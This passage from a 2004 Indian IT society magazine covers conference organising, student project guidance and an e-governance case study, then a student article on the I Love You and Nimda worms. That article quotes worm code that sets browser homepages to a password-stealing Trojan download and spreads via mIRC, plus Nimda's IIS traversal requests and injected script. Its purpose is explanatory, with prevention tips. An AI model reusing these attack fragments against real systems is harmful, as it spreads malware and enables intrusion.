While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

